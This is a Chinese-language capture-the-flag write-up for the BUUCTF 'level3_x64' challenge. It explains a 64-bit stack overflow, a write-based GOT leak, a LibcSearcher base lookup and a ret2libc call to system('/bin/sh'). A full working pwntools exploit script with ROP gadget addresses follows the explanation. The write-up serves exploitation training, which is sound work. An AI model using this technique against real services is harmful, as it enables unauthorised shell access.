1.启动靶机,检查文件类型,用ida编译,按F5得到C语言代码。点击vulnerable_function(),定义了一个一维数组,执行read函数时存在缓冲区溢出,同时之前write函数已执行完,所以总体思路是利用栈溢出覆盖垃圾数据到write_got表地址,泄露出libc,再得到/bin/sh和system的真实地址,得到shell。
2.基于是64位操作系统,程序执行时前六个参数分别保存在rdi,rsi,rdx,rcx,r8和r9上,先通过命令得到rdi等地址。因为write函数值有三个参数,所以只需要填充三个地址即可,注意的第二个地址包含r15,最后在ret,影响不大,按顺序输入参数即可。
3.write的第一个参数是标准输出1,给rdi;第二个参数是存放数据位置,给它write_got地址,第三个参数是字符长度,因为64位操作系统地址是8位,参数传8返回个字节数据,也就是用于后面接收write的真实地址,之后再让程序执行完改造后的代码后正常返回main函数。
4.注意在第二次构造 payload 时,添加rdi_addr的地址是为了在程序执行时正确设置函数调用的参数。在漏洞利用中,通常需要将参数正确传递给目标函数,而rdi寄存器通常用于存储第一个参数。因此,将rdi_addr的地址添加到 payload 中,可以确保在调用目标函数时,参数被正确设置为bin_sh_addr,从而实现所需的功能。
wp如下:
from pwn import*
from LibcSearcher import*
io = remote('node5.buuoj.cn',29853)
#io = process('./level3_x64')
elf = ELF('./level3_x64')
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.sym['main']
rdi_addr = 0x4006b3
rsi_r15_addr = 0x4006b1
payload1 = b'a'*(0x80+0x8) + p64(rdi_addr) + p64(1)
payload1 += p64(rsi_r15_addr) + p64(write_got) + p64(8)
payload1 += p64(write_plt) + p64(main_addr)
io.sendlineafter('Input:\n',payload1)
write_addr = u64(io.recv(8))
#print(hex(write_addr))
libc = LibcSearcher('write',write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc.dump('system') + libc_base
bin_sh_addr = libc.dump('str_bin_sh') + libc_base
payload2 = b'a'*(0x80+0x8) + p64(rdi_addr)
payload2 += p64(bin_sh_addr) + p64(system_addr)
io.sendlineafter('Input:\n',payload2)
io.interactive()
欢迎各位师傅批判指正!!!
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
